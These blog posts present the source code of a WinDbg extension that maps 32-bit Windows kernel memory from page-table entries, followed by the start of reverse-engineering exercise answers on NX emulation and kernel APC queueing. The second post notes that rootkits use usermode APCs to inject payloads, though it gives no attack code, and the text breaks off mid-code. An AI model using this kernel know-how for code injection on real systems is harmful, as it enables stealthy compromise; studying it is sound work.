Tuesday, February 17, 2015

A WinDbg extension to print the kernel memory layout

WinDbg is an awesome debugger, but I always missed the nice, compact and tidy view of the process memory layout that you have in OllyDbg (in View->Memory). Obviously WinDbg is capable of showing information about the virtual memory of a process (e.g. with !vad) or of the kernel (e.g. with !address), but I don't really like the output format of its commands. I wanted a fast-to-read output, thus I decided to experiment with WinDbg's interfaces to write my own extension capable of printing a convenient map of all the kernelmode virtual memory.

I chose to develop a DbgEng-style extension (see this documentation for more information about the extension styles, and how to write an extension in general) that basically provides one main command that does the job. I wrote it for 32bit Windows machines, but I am planning to extend it to 64bit platforms as well. I tested it on Windows XP 32bit with PAE enabled, and in theory it should work on other 32bit Windows versions (with or without PAE), but I have not had time to run further tests yet.

The strategy of the command is simple: it iterates over all the possible virtual addresses of 4k pages in the kernel space (that is, from 0x80000000 to 0xFFFFFFFF; for now I ignore the /3GB configuration option), retrieves their corresponding PTEs and prints the attributes that they contain. Adjacent pages that have the same attributes are joined together and printed as a range. The output also includes some relevant symbols: it locates important regions identified by kernel variables like MmNonPagedPoolStart, MmNonPagedPoolEnd0 etc., and it associates the names of loaded drivers with the regions of memory to which they are mapped.
Here are some excerpts from the output:

 P = present  W = writable  X = executable  L = large
 U/K = user/kernel  T = transition  Y = prototype  S = swapped out/zero demand
 VA               Size     Attributes
-------------------------------------
 0000000080000000 --------             - nt!MmSystemRangeStart 
 0000000080004000 0000b000 P W X   K  
 0000000080010000 0000e000 P W X   K  
 0000000080039000 0000c000 P W X   K  
 000000008009f000 00062000 P W X   K  
 0000000080400000 00400000 P W X L K   - nt - hal
 0000000080a02000 00170000 P W X   K  
 0000000080fb1000 0000f000 P W X   K  
 0000000081000000 01600000 P W X L K   - nt!MmNonPagedPoolStart
 0000000082600000 --------             - nt!MmNonPagedPoolEnd0 
 0000000082600000 --------             - nt!MiExtraResourceStart 
 00000000b1f96000 00001000 P W X   K   - kmixer
 00000000b1f97000 00004000 P   X   K   - kmixer
 ...
 00000000f888a000 00001000 P W X   K   - Cdfs
 00000000f888b000 00001000 P   X   K   - Cdfs
 00000000f888c000 00001000 P W X   K   - Cdfs
 00000000f888d000 0000a000  T          - Cdfs
 00000000f8897000 00001000 P W X   K   - Cdfs
 00000000f88b9000 00001000  T         
 00000000f88c9000 00001000  T         
 00000000f88d7000 00003000 P W     K  
 ...

The VA and Size fields identify the memory range, Attributes shows the properties of the pages it contains, and the rightmost part of the output lists the symbols contained in that range. A VA with an invalid size (identified by "--------") means that the VA is not allocated, but there is a symbol associated with it nonetheless.

It is clear from the output that VA 80400000 is the beginning of a buffer, composed of two large pages (2 MB each), that contains the modules nt and hal. The NonPagedPool is also visible at VA 81000000 (11 large pages).
If we have a look at VA f888a000, we can see that this region of memory contains the module Cdfs.sys. Interestingly, the second page at VA f888b000 is read-only (probably related to the .text section), while VA f888d000 is the start of a set of pages that are not present and that are marked as transition PTEs (probably related to the .INIT or .PAGE section).
The following four files are the full source code of the extension.

file 1: exts.cpp
 #include "dbgexts.h"  
   
 char NameBuffer[1024];  
 char NameBufferPrevious[1024];  
   
 // symbol variables  
   
 bool MemSymbolsOk = false;  
 ULONG64 MemSymbols[][3] = {  
     // [api name] [symbol address] [symbol data]  
     (ULONG64)"nt!MmNonPagedPoolStart", 0, 0,  
     (ULONG64)"nt!MmNonPagedPoolEnd0", 0, 0,  
     (ULONG64)"nt!MmPagedPoolStart", 0, 0,  
     (ULONG64)"nt!MmPagedPoolEnd", 0, 0,  
     (ULONG64)"nt!MmNonPagedPoolExpansionStart", 0, 0,  
     (ULONG64)"nt!MmNonPagedPoolEnd", 0, 0,  
     (ULONG64)"nt!MmSystemRangeStart", 0, 0,  
     (ULONG64)"nt!MiExtraResourceStart", 0, 0,  
     (ULONG64)"nt!MiExtraResourceEnd", 0, 0,  
     (ULONG64)"nt!MiSystemViewStart", 0, 0,  
     (ULONG64)"nt!MiSessionPoolStart", 0, 0,  
     (ULONG64)"nt!MiSessionPoolEnd", 0, 0,  
     (ULONG64)"nt!MiSessionViewStart", 0, 0,  
     (ULONG64)"nt!MmSessionSpace", 0, 0,  
     (ULONG64)"nt!MiSessionImageStart", 0, 0,  
     (ULONG64)"nt!MiSessionImageEnd", 0, 0,  
     (ULONG64)"nt!MiSessionSpaceEnd", 0, 0,  
     (ULONG64)"nt!MmSystemPteBase", 0, 0,  
     (ULONG64)"nt!MmSystemPtesStart", 0, 0,  
     (ULONG64)"nt!MmSystemCacheStart", 0, 0,  
     (ULONG64)"nt!MmSystemCacheEnd", 0, 0,  
     (ULONG64)"nt!MmNonPagedSystemStart", 0, 0,  
     0, 0, 0  
 };  
   
 // passing ULONG64 as parameter is not going to work for some reason  
 // the only way is to pass 32bit numbers. %016llx does not work with printf like functions  
 char *Print64(ULONG32 HighPart, ULONG32 LowPart, char *String)  
 {  
     wsprintf(String, "%08x%08x", HighPart, LowPart);  
     return String;  
 }  
   
 // avoid 64bit parameters...  
 void PrintRange(ULONG32 BasePageAddress, char *BasePage, ULONG32 BaseSize, ULONG32 Attribs)  
 {  
     char AttribString[12];  
     UINT32 i;  
     HRESULT Result;  
   
     // string with attribs: PTWYXSL U/K   
   
     memset(AttribString, ' ', sizeof(AttribString));  
     if(Attribs & 1)  
     {  
         // page is valid, print hardware information  
         AttribString[0] = 'P';  
   
         if(Attribs & 2)    // RW  
         {  
             AttribString[2] = 'W';  
         }  
         if(!(Attribs & 0x80000000))    // NX  
         {  
             AttribString[4] = 'X';  
         }  
         if(Attribs & 0x80)  
         {  
             AttribString[6] = 'L';  
         }  
         if(Attribs & 4)        // User/Kernel  
         {  
             AttribString[8] = 'U';  
         }  
         else  
         {  
             AttribString[8] = 'K';  
         }  
     }  
     else  
     {  
         // Page is not valid, print additional information about Prototype, Transition or Software pages  
         // taken from http://rekall-forensic.blogspot.ie/2014/10/windows-virtual-address-translation-and.html  
         // the windbg command "dt -r _MMPTE" shows all the PTE formats  
   
         if( !(Attribs & 0x400) && (Attribs & 0x800) )    // prototype = 0  transition = 1  
         {  
             // Transition PTE  
             AttribString[1] = 'T';  
         }  
         else if(Attribs & 0x400) // prototype = 1  
         {      
             // Prototype PTE  
             AttribString[3] = 'Y';  
         }  
         else if( !(Attribs & 0x400) && !(Attribs & 0x800) )    // prototype = 0  transition = 0  
         {  
             // Software PTE (paged out/zero demand)  
             AttribString[5] = 'S';  
         }  
   
     }  
     AttribString[10] = 0;  
     ExtPrintf(" %s %08x %s ", BasePage, BaseSize, AttribString);  
   
     // print the symbols associated to this VA range  
   
     i = 0;  
     if(MemSymbolsOk)  
     {  
         while(MemSymbols[i][0] != 0)  
         {  
             if((ULONG32)(MemSymbols[i][2]) >= BasePageAddress &&  
                 (ULONG32)(MemSymbols[i][2]) < BasePageAddress + BaseSize)  
             {  
                 ExtPrintf(" - %s", (char*)MemSymbols[i][0]);    // pass a pointer, not a 64bit integer, to %s  
             }  
             i++;  
         }  
     }  
   
     // print the module names associated with this VA range  
     UINT32 j;  
     NameBufferPrevious[0] = 0;  
     for(i = BasePageAddress; i < BasePageAddress + BaseSize; i += 0x1000)  
     {  
         // try to locate the nearest symbol  
         Result = g_DebugSymbols->GetNearNameByOffset((ULONG64)(LONG)(i), 0, NameBuffer, 1024, NULL, NULL);  
         if(Result == S_OK || Result == S_FALSE)  
         {  
             NameBuffer[1023] = 0;  
             for(j = 0; j < 1024; j++)  
             {  
                 if(NameBuffer[j] == '!')  
                 {  
                     NameBuffer[j] = 0;  
                     break;  
                 }  
             }  
   
             if(j < 1024)  
             {  
                 // only print the name if it was not printed before  
                 if(strcmp(NameBufferPrevious, NameBuffer) != 0)  
                 {  
                     ExtPrintf(" - %s", NameBuffer);  
                     strcpy_s(NameBufferPrevious, 1024, NameBuffer);  
                     NameBufferPrevious[1023] = 0;  
                 }  
             }  
         }  
     }  
   
     ExtPrintf("\n");  
 }  
   
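 // shift the full 64bit value before truncating: shifting a 32bit value by 32 is undefined  
 #define PARAM64(__number, __numstring)    Print64((ULONG32)((ULONG64)(__number) >> 32), (ULONG32)(__number), __numstring)  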
   
 HRESULT CALLBACK exthelp(PDEBUG_CLIENT4 Client, PCSTR args)  
 {  
     INIT_API();  
   
     ExtPrintf("\nUse print_symbol to load the symbols required by the extension \n");  
     ExtPrintf("Then use print_layout to print the whole memory layout of the kernelspace. \n");  
   
     EXIT_API();  
     return S_OK;  
 }  
   
 HRESULT CALLBACK print_layout(PDEBUG_CLIENT4 Client, PCSTR args)  
 {  
     INIT_API();  
   
     ULONG64 PteAddress, PteEntry, BasePage;  
     ULONG32 BaseAttributes, CurrentAttribs, BaseSize, i;  
     ULONG64 Tables[10];  
     ULONG Levels;  
     HRESULT Result;  
     char TempString1[20];  
   
     // flags 0-based  
     // RW bit 1, 0 = read only  
     // U/S bit 2, 0 = kernelmode, 1 = usermode  
     // PS bit 7, 0 = 4k, 1 = large page (2mb with PAE, 4mb without)  
     // NX bit 63, 1 = no execute  
     // W X L U  
   
     ExtPrintf("\n");  
     ExtPrintf(" P = present W = writable X = executable L = large\n");  
     ExtPrintf(" U/K = user/kernel T = transition Y = prototype S = swapped out/zero demand\n");  
     ExtPrintf(" VA        Size   Attributes\n");  
     ExtPrintf("-------------------------------------\n");  
     BasePage = 0xFFFFFFFFFFFFFFFF;  
     BaseAttributes = 0xFFFFFFFF;  
     BaseSize = 0;  
   
     for(ULONG64 VAddress = 0x80000000; VAddress < 0xFFFFF000; VAddress += 0x1000)  
     {  
         Result = g_DataSpaces2->GetVirtualTranslationPhysicalOffsets(VAddress, Tables, 10, &Levels);  
         if(Result != S_OK)  
         {  
             // if there was a previous buffer, print it out  
             if(BasePage != 0xFFFFFFFFFFFFFFFF)  
             {  
                 PrintRange((ULONG32)BasePage, PARAM64(BasePage, TempString1), BaseSize, BaseAttributes);  
             }  
   
             // if the symbol refers to a non allocated page, print it here  
             i = 0;  
             while(MemSymbols[i][0] != 0 && MemSymbolsOk)  
             {  
                 if((ULONG32)(MemSymbols[i][2]) >= (ULONG32)VAddress &&  
                     (ULONG32)(MemSymbols[i][2]) < (ULONG32)VAddress + 0x1000)  
                 {  
                     ExtPrintf(" %s --------       - %s \n", PARAM64(VAddress, TempString1), (char*)MemSymbols[i][0]);  
                 }  
                 i++;  
             }  
   
             BasePage = 0xFFFFFFFFFFFFFFFF;  
             BaseAttributes = 0xFFFFFFFF;  
             BaseSize = 0;  
             continue;  
         }  
   
         PteAddress = Tables[Levels - 2];  
         PteEntry = 0;    // if the read below fails, the page is treated as not present  
         Result = g_DataSpaces->ReadPhysical(PteAddress, &PteEntry, 8, NULL);  
   
         if(BasePage == 0xFFFFFFFFFFFFFFFF)  
         {  
             // case first page of buffer  
             BasePage = VAddress;  
             BaseAttributes = (PteEntry & 0x7FFFFFFF);  
             if(PteEntry & 0x8000000000000000)    // NX bit  
             {  
                 BaseAttributes |= 0x80000000;  
             }  
             BaseSize = 0x1000;  
         }  
         else  
         {  
             CurrentAttribs = (PteEntry & 0x7FFFFFFF);  
             if(PteEntry & 0x8000000000000000)  
             {  
                 CurrentAttribs |= 0x80000000;  
             }  
   
             bool new_buf = true;  
             if((BaseAttributes & 1) && (CurrentAttribs & 1))  
             {  
                 // if P bit is set in both  
                 if( (BaseAttributes & 0x80000087) == (CurrentAttribs & 0x80000087) )  
                 {  
                     // and other interesting bits are equal in both, the buffer is continuing  
                     new_buf = false;  
                 }  
             }  
             else if(!(BaseAttributes & 1) && !(CurrentAttribs & 1))  
             {  
                 // if P bit is not set in both  
                 if( (BaseAttributes & 0x00000C00) == (CurrentAttribs & 0x00000C00) )  
                 {  
                     // and other interesting bits are equal in both, the buffer is continuing  
                     new_buf = false;  
                 }  
             }  
             // if P is different in both, break is obviously necessary  
   
             if(new_buf)  
             {  
                 // if the protection is different:  
                 // print the buffer and continue  
                 PrintRange((ULONG32)BasePage, PARAM64(BasePage, TempString1), BaseSize, BaseAttributes);  
   
                 // break to a new buffer  
                 BasePage = VAddress;  
                 BaseAttributes = (PteEntry & 0x7FFFFFFF);  
                 if(PteEntry & 0x8000000000000000)  
                 {  
                     BaseAttributes |= 0x80000000;  
                 }  
   
                 BaseSize = 0;  
             }  
   
             // case following pages  
             BaseSize += 0x1000;  
         }  
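     }  
   
     // flush the last pending range, which the loop itself never prints  
     if(BasePage != 0xFFFFFFFFFFFFFFFF)  
     {  
         PrintRange((ULONG32)BasePage, PARAM64(BasePage, TempString1), BaseSize, BaseAttributes);  
     }  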
   
     EXIT_API();  
     return S_OK;  
 }  
   
 HRESULT CALLBACK print_symbol(PDEBUG_CLIENT4 Client, PCSTR args)  
 {  
     INIT_API();  
   
     char TempString1[20];  
     char TempString2[20];  
     UINT32 i;  
     HRESULT Result;  
   
     i = 0;  
     while(MemSymbols[i][0] != 0)  
     {  
         Result = g_DebugSymbols->GetOffsetByName((char*)(MemSymbols[i][0]), &(MemSymbols[i][1]));  
         if(Result != S_OK)  
         {  
             ExtPrintf("Error retrieving symbol %s \n", (char*)MemSymbols[i][0]);  
             EXIT_API();    // release the interfaces before the early return  
             return Result;  
         }  
   
         Result = g_DataSpaces->ReadVirtual(MemSymbols[i][1], &(MemSymbols[i][2]), 8, NULL);  
         if(Result != S_OK)  
         {  
             ExtPrintf("Error reading symbol data for %s \n", (char*)MemSymbols[i][0]);  
             EXIT_API();    // release the interfaces before the early return  
             return Result;  
         }  
   
         ExtPrintf("Symbol retrieved %s, offset: %s data: %s \n", (char*)(MemSymbols[i][0]), PARAM64(MemSymbols[i][1], TempString1), PARAM64(MemSymbols[i][2], TempString2));  
   
         i++;  
     }  
   
     MemSymbolsOk = true;  
   
     EXIT_API();  
     return S_OK;  
 }  
   

file 2: dbgexts.h
 #include <windows.h>  
 #include <stdio.h>  
 #include <stdlib.h>  
 #include <string.h>  
   
 #define KDEXT_64BIT  
 #include <wdbgexts.h>  
 #include <dbgeng.h>  
   
 #pragma warning(disable:4201) // nonstandard extension used : nameless struct  
 #include <extsfns.h>  
   
 #ifdef __cplusplus  
 extern "C" {  
 #endif  
   
   
 #define INIT_API()               \  
   HRESULT Status;              \  
   if ((Status = ExtQuery(Client)) != S_OK) return Status;  
   
 #define EXT_RELEASE(Unk) \  
   ((Unk) != NULL ? ((Unk)->Release(), (Unk) = NULL) : NULL)  
   
 #define EXIT_API   ExtRelease  
   
 // Global variables initialized by query.  
 extern PDEBUG_DATA_SPACES2  g_DataSpaces2;  
 extern PDEBUG_DATA_SPACES  g_DataSpaces;  
 extern PDEBUG_SYMBOLS    g_DebugSymbols;  
   
 HRESULT ExtQuery(PDEBUG_CLIENT4 Client);  
 void ExtRelease(void);  
 HRESULT NotifyOnTargetAccessible(PDEBUG_CONTROL Control);  
 void __cdecl ExtPrintf(PCSTR Format, ...);  
   
 #ifdef __cplusplus  
 }  
 #endif  
   

file 3: dbgexts.cpp
 #include "dbgexts.h"  
   
 PDEBUG_CLIENT4    g_ExtClient;  
 PDEBUG_CONTROL    g_ExtControl;  
 PDEBUG_DATA_SPACES2  g_DataSpaces2;  
 PDEBUG_DATA_SPACES  g_DataSpaces;  
 PDEBUG_SYMBOLS    g_DebugSymbols;  
 PDEBUG_SYMBOLS2    g_ExtSymbols;  
   
 extern "C" HRESULT ExtQuery(PDEBUG_CLIENT4 Client)  
 {  
   HRESULT Status;  
   
   if ((Status = Client->QueryInterface(__uuidof(IDebugControl), (void **)&g_ExtControl)) != S_OK)  
   {  
     goto Fail;  
   }  
   if ((Status = Client->QueryInterface(__uuidof(IDebugSymbols2), (void **)&g_ExtSymbols)) != S_OK)  
   {  
         goto Fail;  
   }  
   if ((Status = Client->QueryInterface(__uuidof(IDebugDataSpaces2), (void **)&g_DataSpaces2)) != S_OK)  
   {  
         goto Fail;  
   }  
   if ((Status = Client->QueryInterface(__uuidof(IDebugDataSpaces), (void **)&g_DataSpaces)) != S_OK)  
   {  
         goto Fail;  
   }  
   if ((Status = Client->QueryInterface(__uuidof(IDebugSymbols), (void **)&g_DebugSymbols)) != S_OK)  
   {  
         goto Fail;  
   }  
   
   g_ExtClient = Client;  
   
   return S_OK;  
   
 Fail:  
   ExtRelease();  
   return Status;  
 }  
   
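 void ExtRelease(void)  
 {  
   g_ExtClient = NULL;  
   EXT_RELEASE(g_ExtControl);  
   EXT_RELEASE(g_ExtSymbols);  
   // also release the other interfaces acquired in ExtQuery, otherwise they leak  
   EXT_RELEASE(g_DataSpaces2);  
   EXT_RELEASE(g_DataSpaces);  
   EXT_RELEASE(g_DebugSymbols);  
 }  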
   
 void __cdecl ExtPrintf(PCSTR Format, ...)  
 {  
   va_list Args;  
   
   va_start(Args, Format);  
   g_ExtControl->OutputVaList(DEBUG_OUTCTL_ALL_CLIENTS, Format, Args);  
   va_end(Args);  
 }  
   
 extern "C" HRESULT CALLBACK DebugExtensionInitialize(PULONG Version, PULONG Flags)  
 {  
   *Version = DEBUG_EXTENSION_VERSION(1, 0);  
   *Flags = 0;  
   return S_OK;  
 }  
   
 extern "C" void CALLBACK DebugExtensionNotify(ULONG Notify, ULONG64 Argument)  
 {  
   return;  
 }  
   
 extern "C" void CALLBACK DebugExtensionUninitialize(void)  
 {  
   return;  
 }  
   
 extern "C" HRESULT CALLBACK KnownStructOutput(ULONG Flag, ULONG64 Address, PSTR StructName, PSTR Buffer, PULONG BufferSize)  
 {  
   return S_OK;  
 }  
     

file 4: dbgexts.def
 
 ;--------------------------------------------------------------------  
 ;  Copyright (c) 2000 Microsoft Corporation  
 ;  
 ;Module:  
 ;  dbgexts.def  
 ;--------------------------------------------------------------------  
   
 EXPORTS  
   
 ;--------------------------------------------------------------------  
 ; These are the extensions exported by dll  
 ;--------------------------------------------------------------------  
   
      exthelp  
      print_layout  
      print_symbol  
   
 ;--------------------------------------------------------------------  
 ;  
 ; these are the extension service functions provided for the debugger  
 ;  
 ;--------------------------------------------------------------------  
   
      DebugExtensionNotify  
      DebugExtensionInitialize  
      DebugExtensionUninitialize  
      KnownStructOutput  
   

I took some macros from one of the source code templates that is available in the WinDbg SDK. I had problems when passing 64bit integers as function parameters (the extension was compiled for 32bit), therefore I used a quick and ugly macro (PARAM64) to solve the problem.
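
The idea behind PARAM64 is simply to split a 64bit value into its two 32bit halves and print each half with %08x. Here is a minimal, portable sketch of that idea. Format64 is a hypothetical helper name that is not part of the extension, and it uses snprintf instead of wsprintf so that it compiles outside of Windows:

```cpp
#include <cstdint>
#include <cstdio>
#include <string>

// Hypothetical helper (not part of the extension): format a 64-bit value as
// 16 hex digits by printing its two 32-bit halves separately.
std::string Format64(std::uint64_t value)
{
    // Shift while the value is still 64 bits wide, then truncate.
    const std::uint32_t high = static_cast<std::uint32_t>(value >> 32);
    const std::uint32_t low  = static_cast<std::uint32_t>(value & 0xFFFFFFFFu);

    char buffer[17];  // 16 hex digits plus the terminating NUL
    std::snprintf(buffer, sizeof(buffer), "%08x%08x", high, low);
    return std::string(buffer);
}
```

For example, Format64(0x80400000) gives "0000000080400000", which is the format used in the VA column of the output.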

The core of the functionality is inside the print_layout function/command in exts.cpp:

...
for(ULONG64 VAddress = 0x80000000; VAddress < 0xFFFFF000; VAddress += 0x1000)
{
Result = g_DataSpaces2->GetVirtualTranslationPhysicalOffsets(VAddress, Tables, 10, &Levels);
...
PteAddress = Tables[Levels - 2];
Result = g_DataSpaces->ReadPhysical(PteAddress, &PteEntry, 8, NULL);
...

This is the main loop that iterates over every possible page, performing a virtual-to-physical translation by using GetVirtualTranslationPhysicalOffsets. This function is very interesting because it returns the physical addresses of all the entries used in the steps of the translation: the PDPT entry, the PDE, the PTE and the page itself (the translation steps change according to the features supported by the CPU). Since the last element is the page itself, the code takes the PTE from Tables[Levels - 2]. Then, the code uses ReadPhysical to read the data contained in the PTE and extracts all the attributes from it. The rest of the function simply recognizes ranges of pages that share the same attributes and invokes PrintRange for every range it identifies.
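
The range detection can be shown in isolation from the debugger interfaces. The following is only a sketch: PageInfo, Range and CoalescePages are hypothetical names, and it assumes that the attributes of each page have already been reduced to the bits that matter (the extension instead masks the PTE with 0x80000087 or 0x00000C00 at comparison time):

```cpp
#include <cstdint>
#include <vector>

// Hypothetical types for illustration; they are not part of the extension.
struct PageInfo { std::uint32_t va; std::uint32_t attribs; };
struct Range    { std::uint32_t base; std::uint32_t size; std::uint32_t attribs; };

constexpr std::uint32_t kPageSize = 0x1000;

// Join adjacent pages that carry the same attributes into a single range.
// The input is expected to be sorted by virtual address.
std::vector<Range> CoalescePages(const std::vector<PageInfo>& pages)
{
    std::vector<Range> ranges;
    for (const PageInfo& page : pages)
    {
        if (!ranges.empty())
        {
            Range& last = ranges.back();
            const bool adjacent = (last.base + last.size == page.va);
            if (adjacent && last.attribs == page.attribs)
            {
                last.size += kPageSize;  // the current range continues
                continue;
            }
        }
        // First page, a gap in the address space, or different attributes.
        ranges.push_back({page.va, kPageSize, page.attribs});
    }
    return ranges;
}
```

Collecting the ranges in a vector, rather than printing them as soon as they end, also makes it harder to forget the range that is still pending when the loop terminates.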

As the name suggests, PrintRange is in charge of displaying the gathered information for every range, and takes as its arguments a range's virtual address, size and attributes. In addition, it is also responsible for determining if one of the supported symbols (that are stored in the array MemSymbols) is contained within the range and if a driver module is associated to the range by using GetNearNameByOffset. In case it does, it prints them too. Of course, these two last capabilities only work if the debug symbols are loaded in WinDbg.
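
The decoding of the attributes can also be expressed as a small standalone function. This is a sketch under the assumption of a 64bit PAE PTE; DescribePte is a hypothetical name, and the column positions are the same ones that PrintRange uses:

```cpp
#include <cstdint>
#include <string>

// Hypothetical helper: build the 10-character attribute column from a raw
// 64-bit PAE PTE, using the same column positions as PrintRange.
std::string DescribePte(std::uint64_t pte)
{
    std::string out(10, ' ');
    if (pte & 0x1)                          // bit 0: present
    {
        out[0] = 'P';
        if (pte & 0x2) out[2] = 'W';        // bit 1: writable
        if (!(pte >> 63)) out[4] = 'X';     // bit 63 (NX) clear: executable
        if (pte & 0x80) out[6] = 'L';       // bit 7: large page
        out[8] = (pte & 0x4) ? 'U' : 'K';   // bit 2: user/kernel
    }
    else if (pte & 0x400)                   // bit 10: prototype PTE
    {
        out[3] = 'Y';
    }
    else if (pte & 0x800)                   // bit 11: transition PTE
    {
        out[1] = 'T';
    }
    else                                    // software PTE (paged out/demand zero)
    {
        out[5] = 'S';
    }
    return out;
}
```

A PTE whose low bits are 0x63 is therefore rendered as "P W X   K", like most of the ranges in the excerpt at the beginning of the post.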

Note that the array of the supported symbols contains the names of internal kernel variables that identify interesting areas of memory (e.g. the paged pool, the non paged pool, etc.), and two empty entries that will be filled at run-time with the virtual address of the symbol and the data it points to. This functionality is implemented in the print_symbol function/command: you should call it before print_layout in order to display the supported symbols.

The source files dbgexts.cpp and dbgexts.h contain macros and initialization code that are required by the extension, while dbgexts.def contains the definitions of the exported functions (that will become the actual commands to be invoked from the WinDbg command line).

To compile the extension, you need to add WinDbg's include and library paths, normally located in:

 C:\Program Files\Debugging Tools for Windows (x64)\sdk\inc
 C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\i386

Make sure that you add the .def file via project->properties->linker->input->module definition file (this works on Visual Studio 2010).
Once the extension is compiled, place it in WinDbg's extension folder:

 C:\Program Files (x86)\Debugging Tools for Windows (x86)\winext

and load it from WinDbg with:

.load <extensionfilename>

Also make sure you have Windows debug symbols installed and loaded. At this point, using !print_symbol initializes the supported symbols, and !print_layout produces the final output.

This is a POC and it was a good exercise to practice with WinDbg extensions. I am planning to rework this source code to make it compatible with all versions of Windows on 32 and 64 bit. At the moment it is not very fast: it takes a few minutes to print the whole layout. I think it is possible to speed up the processing by avoiding the brute-force loop over every page and by handling the pages in a smarter way based on the contents of the PDEs and PTEs (basically, if a PDE is invalid I can exclude a lot of memory addresses from the loop).
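
To give an idea of the possible speed-up, here is a rough sketch of a PDE-driven walk. It is not implemented in the extension: the two callbacks are hypothetical stand-ins for the debugger reads, the constants assume PAE (one PDE maps 2 MB, that is 512 pages), and it assumes that nothing below a non-present PDE needs to be reported, which would have to be verified on a real target:

```cpp
#include <cstdint>
#include <functional>

constexpr std::uint64_t kPageSize = 0x1000;         // 4 KB page
constexpr std::uint64_t kPdeSpan  = 0x200000;       // one PAE PDE maps 2 MB
constexpr std::uint64_t kKernelLo = 0x80000000ULL;
constexpr std::uint64_t kKernelHi = 0x100000000ULL; // exclusive upper bound

// Hypothetical callbacks: return the raw PDE/PTE that maps the given VA.
using ReadEntry = std::function<std::uint64_t(std::uint64_t va)>;

struct WalkStats
{
    std::uint64_t pdeReads = 0;
    std::uint64_t pteReads = 0;
    std::uint64_t presentBytes = 0;
};

WalkStats WalkKernelSpace(const ReadEntry& readPde, const ReadEntry& readPte)
{
    WalkStats stats;
    for (std::uint64_t va = kKernelLo; va < kKernelHi; va += kPdeSpan)
    {
        const std::uint64_t pde = readPde(va);
        ++stats.pdeReads;

        if (!(pde & 0x1))
            continue;                        // invalid PDE: skip 512 pages at once

        if (pde & 0x80)
        {
            stats.presentBytes += kPdeSpan;  // large page: no page table to read
            continue;
        }

        // Valid PDE that points to a page table: visit its 512 PTEs.
        for (std::uint64_t page = va; page < va + kPdeSpan; page += kPageSize)
        {
            ++stats.pteReads;
            if (readPte(page) & 0x1)
                stats.presentBytes += kPageSize;
        }
    }
    return stats;
}
```

The 2 GB of kernel space are covered by 1024 PDEs, so in a sparse address space most of the 524288 per-page translations of the brute-force loop would be replaced by a much smaller number of PDE reads.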

Monday, February 9, 2015

Solution to some of "The Windows kernel" exercises from Practical Reverse Engineering (part 2)

Here is the second part of the solutions to the "Windows Kernel" exercises from the "Practical Reverse Engineering" book. Specifically, this post is about the first eight that you will find in the "Investigating and Extending your Knowledge" section.
It should be noted that the code proposed in my solutions is intended as a set of working POCs, and that the methodologies can be generalized/improved so that they work independently of the Windows version etc. Finally, the ideas I used to solve the exercises are based on known mechanisms (e.g. the KeUserModeCallback method).

1)
NX is a bit set in the page tables that specifies whether a memory page can run executable code or not. If the CPU tries to execute code from a page that is not marked as executable, an exception is raised. Windows (and other OSes too) leverages this bit in order to mark heap and stack data areas as not executable. In this way, should a buffer overflow happen, an attacker will not be able to exploit it in order to jump to a shellcode on the heap or stack. This bit is supported on x64 architecture, and on x86 with PAE enabled.
Prior to the introduction of this bit, there were some software implementations that tried to provide non-executable data by using hardware segmentation (e.g. W^X and ExecShield). The x86 hardware, in fact, provides segmentation in order to define code and data segments, each with its own properties (read, write or execute). Normally, Windows (32bit) creates usermode code and data segments (CS and DS) that are as big as the whole 32bit addressable range: this means that according to the code segment properties, every possible 32bit address is executable (the division between usermode and kernelmode is done via the page tables). This leaves the opportunity for an exploit to write shellcodes in data areas and execute them. To sort out this problem without the NX bit, it is possible to make a code segment smaller, in order to leave out a range of addresses that are not part of it. Then a data segment can be created using this range of memory that is not part of the code segment. At this point, the code segment can be marked as executable, and the data segment can be marked as read/write only, ensuring that if the execution ends up in the range of addresses reserved for the data, an exception is raised.
Another potential way to emulate the NX bit would be to modify the page tables for the heap and stack in order to make them invalid: every access to a page would trigger a page fault, that would be trapped by the page fault handler. The OS would have to check the kind of fault, and determine if it is a memory read, write or execute. If it is execute, then there is something wrong and the process will be terminated. In theory, this would work, but in practice it would add a very big overhead on the run time (every memory access would cause an exception!), thus it may not be feasible (the PaX Linux kernel patch uses a similar approach).

2) 
The APIs that provide the functionality to manage APCs are KeInitializeApc and KeInsertQueueApc. Since they are not declared in the DDK headers it is necessary to assign their addresses to appropriate function pointers via MmGetSystemRoutineAddress in order to use them.
  • KeInitializeApc simply initializes a KAPC structure by storing into it all the necessary information about the APC that is going to be queued for execution, including the KTHREAD to which the APC must be queued to and the addresses of the callbacks to run.
  • KeInsertQueueApc, instead, does the actual work of scheduling the APC for execution in the given KAPC.Thread (of type KTHREAD). To do so, it begins by acquiring the spinlock stored in KTHREAD.ApcQueueLock, necessary for proper synchronization. Then, if KTHREAD.ApcQueueable is set to 1, the API invokes the internal function KiInsertQueueApc, which in turn verifies that KAPC.Inserted is set to 0 and, if it is, adds the APC to some memory referenced by the KTHREAD.ApcStatePointer array. In particular, this array contains two pointers to KAPC_STATE structures, where the APC queues (implemented by using LIST_ENTRYs) are actually stored.
    Why two? The first KAPC_STATE structure is related to the APCs whose KAPC.ApcStateIndex is OriginalApcEnvironment, while the second is related to the ones whose KAPC.ApcStateIndex is AttachedApcEnvironment. Basically, the value of KAPC.ApcStateIndex differentiates between the APCs that are running in the context of the process to which the thread belongs and the ones that are running in a thread that is attached to a different process. This is why two structures are kept.
    Once the correct one is determined, a further discrimination is to be made. Each structure contains an array of two LIST_ENTRY structures (named KAPC_STATE.ApcListHead), that are selected according to the value stored in KAPC.ApcMode, which is either 0 (KernelMode) or 1 (UserMode). These are the actual APC queues.
    Once the APC is queued, the member KAPC.Inserted is set to 1, and then, if the APC is kernelmode, KTHREAD.KAPC_STATE.KernelApcPending is also set to 1. Furthermore, HalRequestSoftwareInterrupt may be invoked to switch to APC_LEVEL.
  • The queues of APCs will eventually be walked by the KiDeliverApc API, which will call the various kernel, normal and rundown routines for each APC.
APCs offer the possibility to execute code inside a specific process' context and there are various possible use cases for them. Windows uses APCs to perform thread suspension, to schedule some completion routines, to set and get a thread's context, and more.
Usermode APCs provide a handy way to execute code in usermode from kernelmode, commonly done by rootkits since it allows the possibility to inject malicious payloads in running processes, hook their APIs etc. Examples are presented in the answer to exercise 3.
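
The way the queue is selected can be summarized with a simplified model. This is only an illustration written as ordinary usermode C++: the Model* types and InsertQueueApc are hypothetical, the real structures contain many more fields, only the two environments discussed above are modelled, and locking, the ordering of the APCs inside a queue and the interrupt request are left out:

```cpp
#include <array>
#include <list>
#include <string>

// Simplified, hypothetical model of the structures described above.
enum ApcEnvironment { OriginalApcEnvironment = 0, AttachedApcEnvironment = 1 };
enum ApcMode { KernelMode = 0, UserMode = 1 };

struct ModelApc
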